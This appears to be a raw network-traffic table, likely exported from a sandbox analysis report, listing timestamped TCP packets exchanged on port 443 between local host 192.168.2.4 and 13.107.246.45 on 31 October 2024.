                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.234395981 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.316234112 CET4435141713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.316274881 CET4435141713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.316318989 CET4435141713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.316401005 CET51417443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.319331884 CET51417443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.319333076 CET51417443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.319355965 CET4435141713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.319369078 CET4435141713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.326208115 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.326247931 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.326325893 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.327857971 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.327873945 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.461719036 CET51420443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.461743116 CET4435142013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.878500938 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.884824991 CET51422443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.884839058 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.885417938 CET51422443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.885422945 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.892494917 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.893802881 CET51423443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.893831015 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.894344091 CET51423443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.894351006 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.901077986 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.907264948 CET51424443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.907280922 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.907731056 CET51424443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:34.907738924 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268151999 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268167019 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268196106 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268214941 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268239975 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268383026 CET51423443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268779993 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268830061 CET51422443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268830061 CET51422443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268841028 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268873930 CET51423443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268874884 CET51422443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268891096 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268893003 CET4435142213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268898010 CET51424443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268928051 CET51423443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.268937111 CET4435142313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.270078897 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.270863056 CET51424443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.270869017 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.270879030 CET51424443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.270884037 CET4435142413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.271159887 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.272161007 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.272196054 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.272646904 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.272654057 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.273097038 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.273108959 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.273487091 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.273490906 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.275707960 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.275738955 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.275804996 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.275923967 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.275938034 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.276565075 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.276601076 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.276649952 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277054071 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277074099 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277122974 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277158976 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277170897 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277262926 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.277270079 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.399794102 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.399821997 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.399868011 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.399880886 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.399920940 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.400266886 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.400285006 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.400295973 CET51425443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.400300980 CET4435142513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.403441906 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.403487921 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.403549910 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.403723955 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.403743029 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.404892921 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.404970884 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.405021906 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.405107021 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.405123949 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.405134916 CET51426443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.405139923 CET4435142613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.407362938 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.407413006 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.407491922 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.407633066 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:35.407646894 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.008708954 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009232998 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009252071 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009563923 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009776115 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009784937 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009805918 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.009824038 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.010231972 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.010236979 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.041512966 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.042085886 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.042120934 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.042546988 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.042553902 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156053066 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156220913 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156272888 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156413078 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156424999 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156436920 CET51429443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.156441927 CET4435142913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159579992 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159745932 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159806967 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159879923 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159928083 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.159996033 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160247087 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160268068 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160285950 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160286903 CET51428443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160293102 CET4435142813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.160306931 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.161242962 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.161662102 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.161679983 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.162349939 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.162357092 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163053036 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163100958 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163171053 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163269043 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163286924 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.163969994 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.164216042 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.164233923 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.164594889 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.164599895 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179263115 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179348946 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179420948 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179497957 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179497957 CET51427443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179538965 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.179569006 CET4435142713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.181904078 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.181929111 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.181998968 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.182121038 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.182135105 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295329094 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295614004 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295682907 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295705080 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295717955 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295727968 CET51430443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.295732975 CET4435143013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.298732042 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.298773050 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.298861980 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.299083948 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.299099922 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.299931049 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.299972057 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300025940 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300030947 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300071001 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300250053 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300263882 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300292015 CET51431443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.300297022 CET4435143113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.302608013 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.302639008 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.302733898 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.302891016 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.302906036 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.887799025 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.903739929 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.903779030 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.904124975 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.904134035 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.916779041 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.920461893 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.920484066 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.921025038 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.921031952 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.930124044 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.950592995 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.950608969 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.954991102 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:36.954996109 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.027800083 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.027888060 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.027992010 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.028331995 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.028331995 CET51432443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.028347969 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.028357029 CET4435143213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.030807018 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.037486076 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.057846069 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.058387995 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.058487892 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.058562040 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.058562040 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.060067892 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.060077906 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.067488909 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.067495108 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.075134039 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.075145960 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.081635952 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.081717968 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.081782103 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082303047 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082309008 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082437992 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082448006 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082479954 CET51434443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.082484961 CET4435143413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.086028099 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.086046934 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.086076021 CET51433443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.086081982 CET4435143313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130017996 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130058050 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130131960 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130553961 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130593061 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.130645037 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131292105 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131321907 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131367922 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131458998 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131479979 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131584883 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131602049 CET4435143813.107.246.45192.168.2.4
